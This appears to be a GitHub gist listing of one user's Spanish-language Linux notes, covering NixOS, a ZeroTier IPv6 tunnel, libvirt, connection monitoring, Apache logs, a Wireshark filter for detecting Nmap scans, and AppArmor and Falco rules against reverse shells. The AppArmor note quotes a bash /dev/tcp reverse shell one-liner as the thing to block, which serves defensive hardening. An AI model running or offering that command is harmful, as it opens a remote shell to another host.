Skip to content

Instantly share code, notes, and snippets.

View nullx5's full-sized avatar
:octocat:
🎯 Keep Calm and Code in Python! 🐍

Blessed nullx5

:octocat:
🎯 Keep Calm and Code in Python! 🐍
View GitHub Profile
@nullx5
nullx5 / nixos.md
Last active January 29, 2026 05:14

NixOS

https://www.youtube.com/watch?v=FJVFXsNzYZQ

https://search.nixos.org/packages

Si vienes de Ubuntu o Arch, la tentación de usar nix-env -i es grande. Resístela. La verdadera fuerza de NixOS está en añadir los paquetes a la sección environment.systemPackages de tu archivo /etc/nixos/configuration.nix. Así, tu sistema siempre será reproducible.

NixOS guarda todas las versiones anteriores de tu configuración por si algo sale mal. Esto ocupa espacio.

tunel ipv6 sobre ipv4 con zerotier detras de CG-NAT y nodo de salida IPv6 con vpsfree.org

image
# configurar vpsfree con IPv6 nodo de salida Exit Node zerotier

echo "net.ipv4.ip_forward=1" | sudo tee -a /etc/sysctl.conf
echo "net.ipv6.conf.all.forwarding=1" | sudo tee -a /etc/sysctl.conf
sudo sysctl -p

qemu libvirt virt-install virsh virt-manager

┌─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┐
│                                            Herramientas de usuario                                                  │
│                                                                                                                     │
│  qemu-system    virt-install     virt-clone           virsh / virt-manager             qemu-img                     |

logs ss y lsof

ss

#!/usr/bin/bash

while true; do                                                                       
  sudo ss -tunp
 sleep 2

goaccess logs apache

sudo tail -f /var/log/apache2/access.log

                                                                                                                                                               INT ✘  6s    ▓▒░
192.168.100.35 - - [18/Dec/2025:01:27:30 -0500] "GET / HTTP/1.1" 200 3460 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.168.100.35 - - [18/Dec/2025:01:27:30 -0500] "GET /icons/ubuntu-logo.png HTTP/1.1" 200 3607 "http://192.168.100.35/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.168.100.35 - - [18/Dec/2025:01:27:30 -0500] "GET /favicon.ico HTTP/1.1" 404 492 "http://192.168.100.35/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"

🔥 Filtros Wireshark – detectar escaneo Nmap SYN Scan (hacia tu IP) y Detecta ping y arp a mi maquina:

((tcp.flags.syn == 1 && tcp.flags.ack == 0 && ip.dst == 192.168.100.35) || (icmp && ip.dst == 192.168.100.35) || (arp && arp.dst.proto_ipv4 == 192.168.100.35)) && !(ip.addr == 8.8.8.8)

👀 Tip forense rápido

Después de aplicar el filtro:

@nullx5
nullx5 / apparmor.md
Last active December 16, 2025 09:02

configurar apparmor

  • crear perfiles por aplicacion

Bloquear reverse shell bash -i >& /dev/tcp/192.168.100.5/443 0>&1

sudo apt install apparmor

sudo systemctl status apparmor

¿Qué es una regla Falco anti-reverse-shell?

Falco es un motor de detección de amenazas en tiempo real para Linux (CNCF), creado por Sysdig.

🛡️ ¿Bloquea Falco?

❌ No bloquea por sí solo ✔ Detecta con precisión quirúrgica

Pero puedes reaccionar automáticamente:

Mis alias

# en la terminal con [alias status], despliega el conteniddo del alias
# en la terminal con alias lista todos los alias

nvim .zshrc

#Mis alias
#